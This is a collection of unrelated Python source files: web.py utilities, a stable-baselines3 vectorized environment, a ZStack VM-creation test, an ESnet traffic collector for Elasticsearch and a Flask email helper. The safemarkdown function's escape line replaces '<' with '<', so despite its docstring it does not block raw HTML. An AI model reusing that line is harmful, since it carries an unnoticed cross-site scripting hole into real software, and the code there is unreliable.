key = (args, tuple(keywords.items()))
if key not in self.cache:
self.cache[key] = self.func(*args, **keywords)
return self.cache[key]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""
Like re.sub, but returns the replacement _and_ the match object.
>>> t, m = re_subm('g(oo+)fball', r'f\\1lish', 'goooooofball')
>>> t
'foooooolish'
>>> m.groups()
('oooooo',)
"""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
"""
if not hasattr(seq, 'next'):
seq = iter(seq)
while True:
yield [seq.next() for i in xrange(size)]
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
>>> import itertools
>>> c = iterbetter(itertools.count())
>>> c[1]
1
>>> c[5]
5
>>> c[3]
Traceback (most recent call last):
...
IndexError: already passed 3
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i < self.c:
raise IndexError, "already passed "+str(i)
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
iterbetter = IterBetter
def dictreverse(mapping):
"""
Returns a new dictionary with keys and values swapped.
>>> dictreverse({1: 2, 3: 4})
{2: 1, 4: 3}
"""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
>>> d = {1:2, 3:4}
>>> dictfind(d, 4)
3
>>> dictfind(d, 5)
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
>>> d = {1:4, 3:4}
>>> dictfindall(d, 4)
[1, 3]
>>> dictfindall(d, 5)
[]
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
>>> d = {1:2, 3:4}
>>> dictincr(d, 1)
3
>>> d[1]
3
>>> dictincr(d, 5)
1
>>> d[5]
1
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(*dicts):
"""
Returns a dictionary consisting of the keys in the argument dictionaries.
If they share a key, the value from the last argument is used.
>>> dictadd({1: 0, 2: 0}, {2: 1, 3: 1})
{1: 0, 2: 1, 3: 1}
"""
result = {}
for dct in dicts:
result.update(dct)
return result
def listget(lst, ind, default=None):
"""
Returns `lst[ind]` if it exists, `default` otherwise.
>>> listget(['a'], 0)
'a'
>>> listget(['a'], 1)
>>> listget(['a'], 1, 'b')
'b'
"""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""
Returns `integer` as an int or `default` if it can't.
>>> intget('3')
3
>>> intget('3a')
>>> intget('3a', 0)
0
"""
try:
return int(integer)
except (TypeError, ValueError):
return default
def datestr(then, now=None):
"""
Converts a (UTC) datetime object to a nice string representation.
>>> from datetime import datetime, timedelta
>>> d = datetime(1970, 5, 1)
>>> datestr(d, now=d)
'0 microseconds ago'
>>> for t, v in {
... timedelta(microseconds=1): '1 microsecond ago',
... timedelta(microseconds=2): '2 microseconds ago',
... -timedelta(microseconds=1): '1 microsecond from now',
... -timedelta(microseconds=2): '2 microseconds from now',
... timedelta(microseconds=2000): '2 milliseconds ago',
... timedelta(seconds=2): '2 seconds ago',
... timedelta(seconds=2*60): '2 minutes ago',
... timedelta(seconds=2*60*60): '2 hours ago',
... timedelta(days=2): '2 days ago',
... }.iteritems():
... assert datestr(d, now=d+t) == v
>>> datestr(datetime(1970, 1, 1), now=d)
'January 1'
>>> datestr(datetime(1969, 1, 1), now=d)
'January 1, 1969'
>>> datestr(datetime(1970, 6, 1), now=d)
'June 1, 1970'
"""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not now: now = datetime.datetime.utcnow()
if type(now).__name__ == "DateTime":
now = datetime.datetime.fromtimestamp(now)
if type(then).__name__ == "DateTime":
then = datetime.datetime.fromtimestamp(then)
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
def numify(string):
"""
Removes all non-digit characters from `string`.
>>> numify('800-555-1212')
'8005551212'
>>> numify('800.555.1212')
'8005551212'
"""
return ''.join([c for c in str(string) if c.isdigit()])
def denumify(string, pattern):
"""
Formats `string` according to `pattern`, where the letter X gets replaced
by characters from `string`.
>>> denumify("8005551212", "(XXX) XXX-XXXX")
'(800) 555-1212'
"""
out = []
for c in pattern:
if c == "X":
out.append(string[0])
string = string[1:]
else:
out.append(c)
return ''.join(out)
def commify(n):
"""
Add commas to an integer `n`.
>>> commify(1)
'1'
>>> commify(123)
'123'
>>> commify(1234)
'1,234'
>>> commify(1234567890)
'1,234,567,890'
>>> commify(None)
>>>
"""
if n is None: return None
r = []
for i, c in enumerate(reversed(str(n))):
if i and (not (i % 3)):
r.insert(0, ',')
r.insert(0, c)
return ''.join(r)
def dateify(datestring):
"""
Formats a numified `datestring` properly.
"""
return denumify(datestring, "XXXX-XX-XX XX:XX:XX")
def nthstr(n):
"""
Formats an ordinal.
Doesn't handle negative numbers.
>>> nthstr(1)
'1st'
>>> nthstr(0)
'0th'
>>> [nthstr(x) for x in [2, 3, 4, 5, 10, 11, 12, 13, 14, 15]]
['2nd', '3rd', '4th', '5th', '10th', '11th', '12th', '13th', '14th', '15th']
>>> [nthstr(x) for x in [91, 92, 93, 94, 99, 100, 101, 102]]
['91st', '92nd', '93rd', '94th', '99th', '100th', '101st', '102nd']
>>> [nthstr(x) for x in [111, 112, 113, 114, 115]]
['111th', '112th', '113th', '114th', '115th']
"""
assert n >= 0
if n % 100 in [11, 12, 13]: return '%sth' % n
return {1: '%sst', 2: '%snd', 3: '%srd'}.get(n % 10, '%sth') % n
def cond(predicate, consequence, alternative=None):
"""
Function replacement for if-else to use in expressions.
>>> x = 2
>>> cond(x % 2 == 0, "even", "odd")
'even'
>>> cond(x % 2 == 0, "even", "odd") + '_row'
'even_row'
"""
if predicate:
return consequence
else:
return alternative
class CaptureStdout:
"""
Captures everything `func` prints to stdout and returns it instead.
>>> def idiot():
... print "foo"
>>> capturestdout(idiot)()
'foo\\n'
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
>>> import time
>>> out, inf = profile(time.sleep)(.001)
>>> out
>>> inf[:10].strip()
'took 0.0'
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, tempfile ##, time already imported
temp = tempfile.NamedTemporaryFile()
prof = hotshot.Profile(temp.name)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
import cStringIO
out = cStringIO.StringIO()
stats = hotshot.stats.load(temp.name)
stats.stream = out
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(40)
stats.print_callers()
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += out.getvalue()
return result, x
profile = Profile
import traceback
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
>>> tryall(dict(j=lambda: True))
j: True
----------------------------------------
results:
True: 1
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict:
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
def __getattr__(self, key):
return getattr(self._getd(), key)
def __setattr__(self, key, value):
return setattr(self._getd(), key, value)
def __delattr__(self, key):
return delattr(self._getd(), key)
def __hash__(self):
return id(self)
def _getd(self):
t = threading.currentThread()
if not hasattr(t, '_d'):
# using __dict__ of thread as thread local storage
t._d = {}
# there could be multiple instances of ThreadedDict.
# use self as key
if self not in t._d:
t._d[self] = storage()
return t._d[self]
threadeddict = ThreadedDict
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
>>> self = storage()
>>> autoassign(self, dict(a=1, b=2))
>>> self
<Storage {'a': 1, 'b': 2}>
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
def to36(q):
"""
Converts an integer to base 36 (a useful scheme for human-sayable IDs).
>>> to36(35)
'z'
>>> to36(119292)
'2k1o'
>>> int(to36(939387374), 36)
939387374
>>> to36(0)
'0'
>>> to36(-393)
Traceback (most recent call last):
...
ValueError: must supply a positive integer
"""
if q < 0: raise ValueError, "must supply a positive integer"
letters = "0123456789abcdefghijklmnopqrstuvwxyz"
converted = []
while q != 0:
q, r = divmod(q, 36)
converted.insert(0, letters[r])
return "".join(converted) or '0'
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
from markdown import markdown
if text:
text = text.replace('<', '<')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
def sendmail(from_address, to_address, subject, message, headers=None, **kw):
"""
Sends the email message `message` with mail and envelope headers
    from `from_address` to `to_address` with `subject`.
    Additional email headers can be specified with the dictionary
    `headers`.
If `web.config.smtp_server` is set, it will send the message
to that SMTP server. Otherwise it will look for
`/usr/sbin/sendmail`, the typical location for the sendmail-style
binary. To use sendmail from a different path, set `web.config.sendmail_path`.
"""
try:
import webapi
except ImportError:
webapi = Storage(config=Storage())
if headers is None: headers = {}
cc = kw.get('cc', [])
bcc = kw.get('bcc', [])
def listify(x):
if not isinstance(x, list):
return [safestr(x)]
else:
return [safestr(a) for a in x]
from_address = safestr(from_address)
to_address = listify(to_address)
cc = listify(cc)
bcc = listify(bcc)
recipients = to_address + cc + bcc
headers = dictadd({
'MIME-Version': '1.0',
'Content-Type': 'text/plain; charset=UTF-8',
'Content-Disposition': 'inline',
'From': from_address,
'To': ", ".join(to_address),
'Subject': subject
}, headers)
if cc:
headers['Cc'] = ", ".join(cc)
import email.Utils
from_address = email.Utils.parseaddr(from_address)[1]
recipients = [email.Utils.parseaddr(r)[1] for r in recipients]
message = ('\n'.join([safestr('%s: %s' % x) for x in headers.iteritems()])
+ "\n\n" + safestr(message))
if webapi.config.get('smtp_server'):
server = webapi.config.get('smtp_server')
port = webapi.config.get('smtp_port', 0)
username = webapi.config.get('smtp_username')
password = webapi.config.get('smtp_password')
debug_level = webapi.config.get('smtp_debuglevel', None)
starttls = webapi.config.get('smtp_starttls', False)
import smtplib
smtpserver = smtplib.SMTP(server, port)
if debug_level:
smtpserver.set_debuglevel(debug_level)
if starttls:
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
if username and password:
smtpserver.login(username, password)
smtpserver.sendmail(from_address, recipients, message)
smtpserver.quit()
else:
sendmail = webapi.config.get('sendmail_path', '/usr/sbin/sendmail')
assert not from_address.startswith('-'), 'security'
for r in recipients:
assert not r.startswith('-'), 'security'
if subprocess:
            p = subprocess.Popen([sendmail, '-f', from_address] + recipients, stdin=subprocess.PIPE)
p.stdin.write(message)
p.stdin.close()
p.wait()
else:
            i, o = os.popen2([sendmail, '-f', from_address] + recipients)
i.write(message)
i.close()
o.close()
del i, o
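# A minimal configuration sketch for sendmail(); the addresses and credentials
# below are illustrative assumptions. web.config is expected to be the same
# Storage object this function reads as webapi.config.
#
#     import web
#     web.config.smtp_server = 'smtp.example.com'
#     web.config.smtp_port = 587
#     web.config.smtp_starttls = True
#     web.config.smtp_username = 'mailer'
#     web.config.smtp_password = 'secret'
#     sendmail('us@example.com', 'them@example.com', 'Hello', 'Message body',
#              headers={'Reply-To': 'noreply@example.com'})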
if __name__ == "__main__":
import doctest
doctest.testmod()
|
subproc_vec_env.py
|
import multiprocessing
from collections import OrderedDict
from typing import Sequence
import gym
import numpy as np
from stable_baselines3.common.vec_env.base_vec_env import CloudpickleWrapper, VecEnv
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns, start_method=None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in multiprocessing.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = multiprocessing.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed=None):
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self):
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name, indices=None):
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name, value, indices=None):
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name, *method_args, indices=None, **method_kwargs):
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices):
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs, space):
"""
Flatten observations, depending on the observation space.
:param obs: (list<X> or tuple<X> where X is dict<ndarray>, tuple<ndarray> or ndarray) observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return (OrderedDict<ndarray>, tuple<ndarray> or ndarray) flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
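# A minimal usage sketch. It assumes gym's classic-control environments are
# installed ("CartPole-v1"); any callables returning gym.Env instances work.
# The __main__ guard is required by the 'forkserver'/'spawn' start methods
# described in the class docstring.
if __name__ == "__main__":
    n_envs = 4
    vec_env = SubprocVecEnv([lambda: gym.make("CartPole-v1") for _ in range(n_envs)])
    obs = vec_env.reset()
    actions = [vec_env.action_space.sample() for _ in range(n_envs)]
    obs, rewards, dones, infos = vec_env.step(actions)
    vec_env.close()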
|
test_crt_vm_with_vr_by_max_threads.py
|
'''
New Perf Test for creating KVM VM with SG L3 network.
The number of VMs created depends on the environment variable ZSTACK_TEST_NUM.
This case should use the KVM simulator if the real environment doesn't support
so many resources.
@author: Youyk
'''
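# Environment expected before running this case (values are illustrative):
#
#     os.environ['ZSTACK_TEST_NUM'] = '1000'         # number of VMs to create
#     os.environ['ZSTACK_THREAD_THRESHOLD'] = '500'  # max concurrent creation threads
#     os.environ['imageName_s'] = 'image-for-test'
#     os.environ['l3VlanNetworkName1'] = 'l3-vlan-network-1'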
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import time
import os
import sys
import threading
import random
session_uuid = None
session_to = None
session_mc = None
thread_threshold = os.environ.get('ZSTACK_THREAD_THRESHOLD')
if not thread_threshold:
thread_threshold = 1000
else:
thread_threshold = int(thread_threshold)
exc_info = []
def check_thread_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
raise info1, None, info2
def create_vm(vm):
try:
vm.create()
except:
exc_info.append(sys.exc_info())
def test():
global session_uuid
global session_to
global session_mc
vm_num = os.environ.get('ZSTACK_TEST_NUM')
if not vm_num:
vm_num = 0
else:
vm_num = int(vm_num)
test_util.test_logger('ZSTACK_THREAD_THRESHOLD is %d' % thread_threshold)
test_util.test_logger('ZSTACK_TEST_NUM is %d' % vm_num)
org_num = vm_num
vm_creation_option = test_util.VmOption()
image_name = os.environ.get('imageName_s')
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_name = os.environ.get('l3VlanNetworkName1')
conditions = res_ops.gen_query_conditions('name', '=', l3_name)
l3_uuid = res_ops.query_resource_with_num(res_ops.L3_NETWORK, conditions, \
session_uuid, start = 0, limit = 1)[0].uuid
vm_creation_option.set_l3_uuids([l3_uuid])
conditions = res_ops.gen_query_conditions('type', '=', 'UserVm')
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)[0].uuid
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
session_uuid = acc_ops.login_as_admin()
#change account session timeout.
session_to = con_ops.change_global_config('identity', 'session.timeout', '720000', session_uuid)
session_mc = con_ops.change_global_config('identity', 'session.maxConcurrent', '10000', session_uuid)
vm_creation_option.set_session_uuid(session_uuid)
vm = test_vm_header.ZstackTestVm()
random_name = random.random()
vm_name = 'multihost_basic_vm_%s' % str(random_name)
vm_creation_option.set_name(vm_name)
while vm_num > 0:
check_thread_exception()
vm.set_creation_option(vm_creation_option)
vm_num -= 1
thread = threading.Thread(target=create_vm, args=(vm,))
while threading.active_count() > thread_threshold:
time.sleep(1)
thread.start()
while threading.active_count() > 1:
time.sleep(0.01)
cond = res_ops.gen_query_conditions('name', '=', vm_name)
vms = res_ops.query_resource_count(res_ops.VM_INSTANCE, cond, session_uuid)
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
acc_ops.logout(session_uuid)
if vms == org_num:
test_util.test_pass('Create %d VMs Test Success' % org_num)
else:
test_util.test_fail('Create %d VMs Test Failed. Only find %d VMs.' % (org_num, vms))
#Will be called only if exception happens in test().
def error_cleanup():
if session_to:
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
if session_mc:
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
if session_uuid:
acc_ops.logout(session_uuid)
|
ESnetCollector.py
|
#!/usr/bin/python
import os, sys, time
import threading
from threading import Thread
import requests
import json
from datetime import datetime
from elasticsearch import Elasticsearch, exceptions as es_exceptions
from elasticsearch import helpers
lastReconnectionTime = 0
es = None
ESserver = sys.argv[1]
ESport = int(sys.argv[2])
APIkey = sys.argv[3]
url = 'https://my.es.net/graphql_token'
auth = None
timeout=10
if len(sys.argv)>=6:
auth = (sys.argv[4], sys.argv[5]) #es-atlas, pass
if len(sys.argv)==7:
    timeout = int(sys.argv[6]) #600
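# Invocation sketch, matching the positional arguments parsed above
# (host, credentials and token are illustrative):
#
#     python ESnetCollector.py es.example.org 9200 <my.es.net API token> es-atlas <password> 600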
class interface:
def __init__(self, name, has_flow=True, tags=[]):
self.name=name
self.has_flow=has_flow
self.tags=tags
self.lastInterfaceUpdate = datetime.utcnow()
self.lastFlowUpdate = datetime.utcnow()
def prnt(self):
print ('interface: ', self.name, 'flow: ', self.has_flow, 'tags:', self.tags)
def getInterfaces():
interfaces=[]
print("Getting interfaces...")
entities_q = """ query { networkEntities(entityType:"LHCONE") { shortName hasFlow tags } } """
try:
r = requests.get(url, dict(query=entities_q), headers=dict(Authorization='Token ' + APIkey))
if r.status_code == 200:
entities = r.json()
# print(entities)
for e in entities['data']['networkEntities']:
interfaces.append(interface(e['shortName'],e['hasFlow'],e['tags']))
else:
            print('got status {0}: {1}'.format(r.status_code, r.content))
except:
print ("Unexpected error in getting Interfaces:", sys.exc_info()[0])
print ("Done.")
for i in interfaces:
i.prnt()
return interfaces
def getInterfaceData(i):
#print ("Loading interface data for: ",i.name)
currenttime = datetime.utcnow()
res=[]
interface_q = """
query {
networkEntity(shortName: "%s", entityType: "LHCONE") {
interfaces (beginTime: "%s", endTime:"%s") { device interface traffic }
}
}""" % (i.name, i.lastInterfaceUpdate.isoformat(), currenttime.isoformat())
try:
r = requests.get(url, dict(query=interface_q), headers=dict(Authorization='Token ' + APIkey))
if r.status_code != 200:
            print('got status {0}: {1}'.format(r.status_code, r.content))
return res
dat = r.json()
ins = dat['data']['networkEntity']['interfaces']
#print(ins)
d = datetime.utcnow()
ind="esnet_"+str(d.year)+"-"+str(d.month)
data = {
'_index': ind,
'_type': 'interface',
'site': i.name
}
for s in ins:
data['device'] = s["device"]
data['interface'] = s["interface"]
st = json.loads(s['traffic'])
traf = st["points"]
data['description'] = st["name"]
for sample in traf:
data['timestamp'] = sample[0]
data['rateIn'] = long(sample[1])
data['rateOut'] = long(sample[2])
res.append(data.copy())
print(i.name,'got',len(res),"interface results.")
i.lastInterfaceUpdate = currenttime
return res
except:
print ("Unexpected error:", sys.exc_info()[0])
return res
def getFlowData(i):
#print ("Loading flow data for: ",i.name)
currenttime = datetime.utcnow()
res=[]
try:
flow_q = """
query {
networkEntity(shortName:"%s", entityType:"LHCONE") {
flow(breakdown: "vpnsite" beginTime: "%s", endTime: "%s") { name traffic }
}}""" % (i.name, i.lastFlowUpdate.isoformat(), currenttime.isoformat())
r = requests.get(url, dict(query=flow_q), headers=dict(Authorization='Token ' + APIkey))
if r.status_code != 200:
            print('flow got status {0}: {1}'.format(r.status_code, r.content))
return res
dat = r.json()
flows= dat['data']['networkEntity']['flow']
#print(flows)
d = datetime.now()
ind="esnet_"+str(d.year)+"-"+str(d.month)
data = {
'_index': ind,
'_type': 'flow',
'site1': i.name
}
for f in flows:
data['site2']=f["name"].split("(")[0]
st=json.loads(f['traffic'])
traf=st["points"]
for sample in traf:
data['timestamp']=sample[0]
data['rateIn']=sample[1]
data['rateOut']=sample[2]
res.append(data.copy())
print(i.name,'got',len(res),"flow results.")
i.lastFlowUpdate = currenttime
return res
except:
print ("Unexpected error in flow data parsing: ", sys.exc_info()[0])
return res
def GetESConnection(lastReconnectionTime):
if ( time.time()-lastReconnectionTime < 60 ):
return
lastReconnectionTime=time.time()
print ("make sure we are connected right...")
res = requests.get('http://' + ESserver + ':' + str(ESport))
#sys.exit(0)
print(res.content)
es = Elasticsearch([{'host': ESserver, 'port': ESport} ],http_auth=auth,timeout=timeout)
return es
def loader(i):
    global es
print ("starting a thread for ", i.name)
while(True):
aLotOfData=getInterfaceData(i)
aLotOfData.extend(getFlowData(i))
try:
res = helpers.bulk(es, aLotOfData, raise_on_exception=True)
aLotOfData=[]
print (i.name, "inserted:",res[0], 'Errors:',res[1])
except es_exceptions.ConnectionError as e:
print ('ConnectionError ', e)
except es_exceptions.TransportError as e:
print ('TransportError ', e)
except helpers.BulkIndexError as e:
print (e)
# for i in e[1]:
# print i
except:
print ('Something seriously wrong happened indexing. ', sys.exc_info()[0])
time.sleep(900)
es = GetESConnection(lastReconnectionTime)
def main():
print('starting collection')
global es
while (not es):
es = GetESConnection(lastReconnectionTime)
interfaces=getInterfaces()
# staggered start loaders threads
for i in interfaces:
time.sleep(20)
t = Thread(target=loader,args=(i,))
t.daemon = True
t.start()
while(True):
at=threading.active_count()
print ("Active threads: ", at)
while (not es):
es = GetESConnection(lastReconnectionTime)
time.sleep(900)
sys.exit()
if __name__ == "__main__":
main()
|
email_util.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from threading import Thread
from flask import current_app
from flask import render_template
from flask_mail import Message
from .. import mail
def send_async_email(_app, msg):
with _app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['FORUM_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FORUM_MAIL_SENDER'], recipients=[to])
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
